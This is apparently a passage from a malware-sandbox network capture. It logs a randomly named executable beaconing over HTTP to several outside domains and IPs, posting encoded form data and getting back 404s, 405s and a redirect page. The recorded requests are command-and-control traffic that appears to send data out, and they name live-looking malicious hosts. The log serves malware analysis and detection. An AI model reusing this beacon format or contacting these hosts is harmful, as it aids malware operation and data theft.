Jan 10, 2025 20:27:41.215569973 CET	1236	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Fri, 10 Jan 2025 19:27:41 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
Jan 10, 2025 20:27:41.215641975 CET	253	IN	Data Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.10	49983	74.48.143.82	80	6544	C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:27:43.171972036 CET	455	OUT	GET /mlxg/?KzB47nV=cQzZIkxePH03UbtQeBzk4injmTvYH6638l8io/jKjoXZ1YEXRx5ntf5pTkNOcA/fsinJED0Fc0Ua6QV4aMGrU+dJXjaTCQaUtQq1o15v4dK3n1/iEQ==&ity41=G4jxKXr HTTP/1.1 Host: www.bpgroup.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Jan 10, 2025 20:27:43.728873014 CET	1236	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Fri, 10 Jan 2025 19:27:43 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
Jan 10, 2025 20:27:43.728897095 CET	253	IN	Data Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.10	49984	13.248.169.48	80	6544	C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:27:48.790218115 CET	722	OUT	POST /dash/ HTTP/1.1 Host: www.fortevision.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Origin: http://www.fortevision.xyz Referer: http://www.fortevision.xyz/dash/ Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Content-Length: 196 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36 Data Raw: 4b 7a 42 34 37 6e 56 3d 56 4f 76 68 74 72 41 48 41 55 51 64 69 73 4f 58 5a 4e 4c 6a 63 4b 4b 64 30 73 66 4f 32 4a 42 53 61 48 45 52 32 54 33 63 53 4b 6a 76 52 76 56 67 4a 6c 74 75 45 44 6f 42 51 68 78 31 6f 65 41 68 31 2f 48 4e 33 72 39 50 79 47 59 50 70 6a 59 4f 33 67 4e 50 6a 75 39 6a 55 4a 53 44 44 39 49 32 76 2f 6a 30 2b 35 63 75 78 46 55 2f 75 39 33 69 78 34 71 61 65 65 65 53 58 50 75 50 73 38 68 32 7a 66 66 78 5a 72 57 76 74 63 59 4f 54 33 59 4c 31 65 53 47 79 64 73 7a 65 66 42 36 57 4b 74 37 74 67 70 37 4f 5a 75 2b 4c 2f 69 53 2f 2f 78 4a 78 44 65 37 63 54 4c 63 43 2f 2b 53 Data Ascii: KzB47nV=VOvhtrAHAUQdisOXZNLjcKKd0sfO2JBSaHER2T3cSKjvRvVgJltuEDoBQhx1oeAh1/HN3r9PyGYPpjYO3gNPju9jUJSDD9I2v/j0+5cuxFU/u93ix4qaeeeSXPuPs8h2zffxZrWvtcYOT3YL1eSGydszefB6WKt7tgp7OZu+L/iS//xJxDe7cTLcC/+S

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.10	49985	13.248.169.48	80	6544	C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:27:51.333789110 CET	746	OUT	POST /dash/ HTTP/1.1 Host: www.fortevision.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Origin: http://www.fortevision.xyz Referer: http://www.fortevision.xyz/dash/ Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Content-Length: 220 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36 Data Raw: 4b 7a 42 34 37 6e 56 3d 56 4f 76 68 74 72 41 48 41 55 51 64 68 4d 2b 58 62 75 6a 6a 56 4b 4b 43 77 63 66 4f 34 70 42 65 61 48 41 52 32 58 4f 5a 53 66 7a 76 52 4b 70 67 49 67 42 75 46 44 6f 42 59 42 78 77 33 75 42 76 31 34 50 7a 33 70 35 50 79 47 38 50 70 6d 38 4f 77 54 6c 4f 67 65 39 68 4e 5a 53 57 65 4e 49 32 76 2f 6a 30 2b 39 38 45 78 46 63 2f 75 4a 7a 69 33 74 65 5a 64 65 65 4e 55 50 75 50 6e 63 68 79 7a 66 65 6b 5a 70 75 56 74 65 77 4f 54 32 6f 4c 31 76 53 46 39 64 73 70 41 76 41 78 58 37 41 74 6f 44 6c 75 55 49 4b 6d 5a 4d 2b 63 34 65 4d 4f 67 53 2f 73 50 6b 58 53 4d 35 4c 34 41 57 34 49 5a 6c 74 48 74 5a 44 66 2f 31 53 42 58 35 38 43 44 77 3d 3d Data Ascii: KzB47nV=VOvhtrAHAUQdhM+XbujjVKKCwcfO4pBeaHAR2XOZSfzvRKpgIgBuFDoBYBxw3uBv14Pz3p5PyG8Ppm8OwTlOge9hNZSWeNI2v/j0+98ExFc/uJzi3teZdeeNUPuPnchyzfekZpuVtewOT2oL1vSF9dspAvAxX7AtoDluUIKmZM+c4eMOgS/sPkXSM5L4AW4IZltHtZDf/1SBX58CDw==
Jan 10, 2025 20:27:51.776446104 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.10	49986	13.248.169.48	80	6544	C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:27:53.882965088 CET	1759	OUT	POST /dash/ HTTP/1.1 Host: www.fortevision.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Origin: http://www.fortevision.xyz Referer: http://www.fortevision.xyz/dash/ Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Content-Length: 1232 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36 Data Raw: 4b 7a 42 34 37 6e 56 3d 56 4f 76 68 74 72 41 48 41 55 51 64 68 4d 2b 58 62 75 6a 6a 56 4b 4b 43 77 63 66 4f 34 70 42 65 61 48 41 52 32 58 4f 5a 53 63 54 76 51 2f 6c 67 4a 44 35 75 58 7a 6f 42 53 68 78 78 33 75 42 69 31 2b 6e 4a 33 70 31 31 79 45 30 50 6f 41 67 4f 31 6d 5a 4f 37 4f 39 68 51 4a 54 78 44 39 49 2f 76 38 62 77 2b 35 51 45 78 46 63 2f 75 49 44 69 6d 34 71 5a 62 65 65 53 58 50 75 44 73 38 68 4b 7a 66 58 54 5a 70 72 6f 73 76 51 4f 54 57 34 4c 33 39 36 46 30 64 73 33 42 76 42 78 58 37 4e 7a 6f 46 42 31 55 49 2f 78 5a 4d 47 63 39 37 34 55 30 7a 58 52 61 56 48 77 4a 71 66 53 49 54 73 4b 65 46 6f 6b 6d 4d 44 64 39 55 6e 50 57 59 56 34 55 6e 2f 58 49 73 4b 39 4d 50 42 63 54 74 44 73 42 4e 76 4f 53 46 43 4f 59 35 33 2b 76 51 4d 6b 72 55 46 63 49 5a 39 76 67 48 75 59 4b 46 75 51 79 49 58 41 49 49 55 4c 43 48 72 5a 4d 72 39 4c 6e 4f 53 51 52 6b 31 32 4b 45 6a 6e 44 6f 57 44 4e 2b 51 67 43 4a 46 43 32 45 51 46 4b 77 78 68 43 36 74 6a 41 59 4e 38 79 75 7a 48 78 33 73 44 76 56 4d 34 44 59 59 41 74 41 [TRUNCATED] Data Ascii: KzB47nV=VOvhtrAHAUQdhM+XbujjVKKCwcfO4pBeaHAR2XOZScTvQ/lgJD5uXzoBShxx3uBi1+nJ3p11yE0PoAgO1mZO7O9hQJTxD9I/v8bw+5QExFc/uIDim4qZbeeSXPuDs8hKzfXTZprosvQOTW4L396F0ds3BvBxX7NzoFB1UI/xZMGc974U0zXRaVHwJqfSITsKeFokmMDd9UnPWYV4Un/XIsK9MPBcTtDsBNvOSFCOY53+vQMkrUFcIZ9vgHuYKFuQyIXAIIULCHrZMr9LnOSQRk12KEjnDoWDN+QgCJFC2EQFKwxhC6tjAYN8yuzHx3sDvVM4DYYAtAzkL1e8PV0b2qNyQhrB5nAOT/STgXu0imYFG/JZ6aGZZSaaj4zoIjouWp7Dv7YRISiubAdQ+tv46PlbRkYuCwuRTh1+FtRY6wCoGCiwS/CM88l8bd901tN8qo1HW3sWUjIQI35VcEFuQyM6hzyPt/JXQetlw4Ani6HkBzVw0y3S1syDG5P0fyRqd5E4G5ymzNNg6WExHACGJ34Neink4+mqGApMjDg4zao3aetfaOmseesHoq6aryZfk6O6UT9FU85ijwnOzSXpCKqVWxyMYqo7hewY1SwhmvDR1IvopF4j7njzaRrwGiJfJVEWSJZnLLc/q/ucE5Wsthaci/dMkcqt/dzY6gmbWxKinMvSGK/v39Y///tn5t9hxvOfdbo4HlBwW1bAo0N4+RgLx/ismy3cK2YBqCa4i6tuFVKWkQvFe0Z8RcrlVqDQzRY6ASDWulCAPvKyXeDaIOdi74WWyDzW4vT0olIGnvY50Dxxwu/xtayjXW72TBoFslBM0AGIp1jLmKHu+W2Jvb5iIDLD5gGt5fVTuAKLueBCLpKMn3IPx11u3EChcdhbKx4LDzRVwKx7Klq1nkQjuyQERPlPeULLfW5bbtik8eiQ9wQiOKpiRRzo0baqm5QGMiFSCVaptu4GQahItIYmv4eyQG/8tBP7l0V1djkkS6VD [TRUNCATED]
Jan 10, 2025 20:27:54.325609922 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.10	49987	13.248.169.48	80	6544	C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:27:56.421020031 CET	458	OUT	GET /dash/?ity41=G4jxKXr&KzB47nV=YMHBudoHIUxH+uWLZqjBWOOezInCz6AkcjAI4kujT8yqZMh8PwdCYhUcXF8Hm7NuwJrkm81K0kAXhGwUtx1Q7rAgUq2fct0m2tHm8/896FICvJPjzg== HTTP/1.1 Host: www.fortevision.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Jan 10, 2025 20:27:56.899673939 CET	374	IN	HTTP/1.1 200 OK content-type: text/html date: Fri, 10 Jan 2025 19:27:56 GMT content-length: 253 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 69 74 79 34 31 3d 47 34 6a 78 4b 58 72 26 4b 7a 42 34 37 6e 56 3d 59 4d 48 42 75 64 6f 48 49 55 78 48 2b 75 57 4c 5a 71 6a 42 57 4f 4f 65 7a 49 6e 43 7a 36 41 6b 63 6a 41 49 34 6b 75 6a 54 38 79 71 5a 4d 68 38 50 77 64 43 59 68 55 63 58 46 38 48 6d 37 4e 75 77 4a 72 6b 6d 38 31 4b 30 6b 41 58 68 47 77 55 74 78 31 51 37 72 41 67 55 71 32 66 63 74 30 6d 32 74 48 6d 38 2f 38 39 36 46 49 43 76 4a 50 6a 7a 67 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ity41=G4jxKXr&KzB47nV=YMHBudoHIUxH+uWLZqjBWOOezInCz6AkcjAI4kujT8yqZMh8PwdCYhUcXF8Hm7NuwJrkm81K0kAXhGwUtx1Q7rAgUq2fct0m2tHm8/896FICvJPjzg=="}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.10	49988	103.21.221.87	80	6544	C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:28:02.221708059 CET	737	OUT	POST /mv7p/ HTTP/1.1 Host: www.rtpterbaruwaktu3.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Origin: http://www.rtpterbaruwaktu3.xyz Referer: http://www.rtpterbaruwaktu3.xyz/mv7p/ Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Content-Length: 196 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36 Data Raw: 4b 7a 42 34 37 6e 56 3d 30 56 4d 37 2f 41 6f 66 64 69 35 4f 61 54 53 53 63 6a 42 30 75 5a 45 6c 38 57 4d 76 4e 42 67 53 6e 38 4a 36 39 6e 45 59 32 46 58 34 68 77 71 44 44 6d 4e 74 6d 56 48 71 34 2b 38 46 59 54 4e 53 31 36 47 2b 45 44 30 72 56 76 74 6e 79 67 77 7a 6b 2b 43 51 4c 34 63 72 4b 5a 6b 70 4c 61 57 78 47 6b 4f 4c 34 53 34 46 70 5a 6b 49 59 65 53 67 2f 38 70 76 2f 58 58 62 32 4f 6f 69 54 5a 45 6c 49 38 52 38 4c 46 4b 66 66 4b 6a 5a 64 6d 4d 4f 49 41 62 49 7a 68 77 34 2f 48 62 4b 6b 2b 63 52 69 79 34 64 56 71 55 43 33 56 4c 39 35 5a 2f 55 45 65 67 33 76 72 48 69 39 70 50 74 Data Ascii: KzB47nV=0VM7/Aofdi5OaTSScjB0uZEl8WMvNBgSn8J69nEY2FX4hwqDDmNtmVHq4+8FYTNS16G+ED0rVvtnygwzk+CQL4crKZkpLaWxGkOL4S4FpZkIYeSg/8pv/XXb2OoiTZElI8R8LFKffKjZdmMOIAbIzhw4/HbKk+cRiy4dVqUC3VL95Z/UEeg3vrHi9pPt
Jan 10, 2025 20:28:03.102021933 CET	1033	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Fri, 10 Jan 2025 19:28:02 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.10	49989	103.21.221.87	80	6544	C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:28:04.950292110 CET	761	OUT	POST /mv7p/ HTTP/1.1 Host: www.rtpterbaruwaktu3.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Origin: http://www.rtpterbaruwaktu3.xyz Referer: http://www.rtpterbaruwaktu3.xyz/mv7p/ Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Content-Length: 220 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36 Data Raw: 4b 7a 42 34 37 6e 56 3d 30 56 4d 37 2f 41 6f 66 64 69 35 4f 61 33 57 53 51 6b 56 30 70 35 45 69 6c 6d 4d 76 58 78 68 62 6e 38 46 36 39 6d 77 49 32 77 2f 34 68 56 57 44 53 53 52 74 6e 56 48 71 67 4f 39 75 58 7a 4d 2f 31 36 4b 49 45 42 67 72 56 76 35 6e 79 68 41 7a 6b 4a 32 52 4a 6f 63 74 42 35 6b 72 54 36 57 78 47 6b 4f 4c 34 53 38 2f 70 66 4d 49 5a 75 69 67 2f 65 42 73 6a 6e 58 45 69 65 6f 69 5a 35 46 75 49 38 52 65 4c 45 57 35 66 49 72 5a 64 6a 6f 4f 49 53 6a 4c 36 68 77 2b 77 6e 61 7a 30 73 39 5a 72 33 46 36 64 4d 45 31 31 58 4c 6e 7a 59 43 54 56 50 42 67 38 63 62 73 7a 76 36 48 62 31 35 44 6c 38 42 4b 34 49 6c 68 54 78 49 67 71 38 65 4f 43 51 3d 3d Data Ascii: KzB47nV=0VM7/Aofdi5Oa3WSQkV0p5EilmMvXxhbn8F69mwI2w/4hVWDSSRtnVHqgO9uXzM/16KIEBgrVv5nyhAzkJ2RJoctB5krT6WxGkOL4S8/pfMIZuig/eBsjnXEieoiZ5FuI8ReLEW5fIrZdjoOISjL6hw+wnaz0s9Zr3F6dME11XLnzYCTVPBg8cbszv6Hb15Dl8BK4IlhTxIgq8eOCQ==
Jan 10, 2025 20:28:05.835823059 CET	1033	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Fri, 10 Jan 2025 19:28:05 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.10	49990	103.21.221.87	80	6544	C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe

Timestamp	Bytes transferred	Direction	Data
